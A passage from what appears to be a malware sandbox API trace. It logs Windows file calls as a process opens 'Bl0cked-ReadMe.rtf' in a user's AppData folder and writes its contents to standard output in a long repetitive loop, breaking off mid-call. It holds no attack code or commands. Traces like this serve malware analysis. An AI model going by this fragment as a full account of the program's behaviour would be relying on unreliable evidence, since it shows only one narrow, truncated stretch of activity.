(_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0140.054] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0140.054] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ae360, dwCreationDisposition=0x3, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0140.054] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] GetFileType (hFile=0x54) returned 0x1 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ae3b8 | out: lpFileSizeHigh=0x2ae3b8*=0x0) returned 0x1632 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0140.054] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.054] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.055] GetFileType (hFile=0x4c) returned 0x1 [0140.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.055] GetFileType (hFile=0x4c) returned 0x1 [0140.055] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.055] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.056] GetFileType (hFile=0x4c) returned 0x1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.056] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.056] GetFileType (hFile=0x4c) returned 0x1 [0140.056] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, 
lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.057] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.057] _get_osfhandle 
(_FileHandle=4) returned 0x54 [0140.057] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.057] GetFileType (hFile=0x4c) returned 0x1 [0140.057] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] 
GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.058] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.058] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] GetFileType (hFile=0x4c) returned 0x1 [0140.058] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.058] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | 
out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, 
lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.059] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.059] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.059] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.059] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] GetFileType (hFile=0x4c) returned 0x1 [0140.060] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.060] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.060] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.060] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) 
returned 1 [0140.060] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.060] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] GetFileType (hFile=0x4c) returned 0x1 [0140.061] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.061] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.061] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.062] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.062] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, 
lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.062] GetFileType (hFile=0x4c) returned 0x1 [0140.062] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af3d0*, lpNumberOfBytesWritten=0x2ae3d4*=0x20, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.063] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ae3c0 | out: lpNewFilePointer=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=4) returned 0x54 [0140.063] ReadFile (in: hFile=0x54, lpBuffer=0x2af1f0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ae3e0, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesRead=0x2ae3e0*=0x200, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af1f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af1f0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af240*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af240*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af290*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af290*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af2e0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af2e0*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af330*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af330*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] GetFileType (hFile=0x4c) returned 0x1 [0140.063] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.063] WriteFile (in: hFile=0x4c, lpBuffer=0x2af380*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ae3d4, lpOverlapped=0x0 | out: lpBuffer=0x2af380*, lpNumberOfBytesWritten=0x2ae3d4*=0x50, lpOverlapped=0x0) returned 1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] GetFileType (hFile=0x4c) returned 0x1 [0140.064] _get_osfhandle (_FileHandle=1) returned 0x4c [0140.064] WriteFile (in: hFile=0x4c, lpBuffer=0x2af3d0*, nNumberOfBytesToWrite=0x20, 